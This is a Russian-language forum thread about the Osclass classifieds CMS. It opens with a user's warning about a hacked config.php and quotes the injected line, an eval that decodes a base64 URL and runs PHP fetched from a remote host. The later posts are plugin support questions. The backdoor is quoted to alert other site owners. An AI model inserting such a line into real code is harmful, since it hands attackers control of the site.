Все про Osclass

Статус
В этой теме нельзя размещать новые ответы.
Хочу предупредить проверьте на хостинге атрибуты файла config.php должны быть права 644 и проверьте ответ сервера должна страница отдавать 200 ок.
проворонил и вписали редирект - eval(file_get_contents(base64_decode(«aHR0cDovL3dhcmV6Y2luaXouY29tL2h0cy9pMS50eHQ=»)));
первой строкой. :lol:
теперь ждать расклейки.
и был вирусняк на нерабочем сайте /oc-content/plugins/banner_ads/img/advert/6.jpg
и в /oc-content/plugins/intant_messenger я не ставил, вдруг кто ставил плагин.
 
Последнее редактирование:
Друзья помогите пожалуйста, как добавить чекбокс на странице поиска в фильтр: "Показать только премиум объявления", какой код может это реализовать?
тема какая
напиши в лс
 
Поделитесь кодом у кого есть? для турбо страниц Яндекса RSSFeed.php
 
Osclass Pay Plugin подскажите в чем проблема, когда я пытаюсь добавить юзеру денег на счет сколько бы я не положи то у него счет идет после нуля 0.566. Тоисть я даю ему 50 а он получает -0,00254664
 

Вложения

  • ошиб.jpg
    ошиб.jpg
    46,2 KB · Просмотры: 29
Ты в Америке живешь? Нет. А что не судьба настроить плагин, перевода тоже нет, валюту свою поставить, работает osclass_pay просто исключительно хорошо. Доллары смени. Всё работает. Помню переводил osclass_pay почти трое суток...... в ручную, более 1100 предложений через poedit
Та на всех валютах такое!
 
Для просмотра ссылки Войди или Зарегистрируйся
Подскажите пожалуйста кто ставил себе карту
Для просмотра ссылки Войди или Зарегистрируйся
Все настроил, получил ключ но карта на сайте не отображается? что еще может надо?
Внимательно проверьте, что вы проверили домен, был ли он добавлен в разрешенные домены. И последнее, но не менее важное: Google больше не дает вам ключей, если вы создали новый профиль или добавили новый проект, он не будет работать. Если у вас уже есть работающий / проверенный проект, используйте его ключ, добавив дополнительные параметры, которые вы хотите опубликовать в проекте. Я перевожу с помощью Google Translate с болгарского на русский. Надеюсь, вы меня правильно поняли.
 
Osclass Pay Plugin подскажите в чем проблема, когда я пытаюсь добавить юзеру денег на счет сколько бы я не положи то у него счет идет после нуля 0.566. Тоисть я даю ему 50 а он получает -0,00254664
Если у вас активирован плагин кеша, сначала удалите кеш, деактивируйте, а затем удалите плагин. Для меня это было проблемой.
 
this plugin push messages to all participants
 

Вложения

  • 108_v2_20190509_wgo2aq.zip
    651,1 KB · Просмотры: 101
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху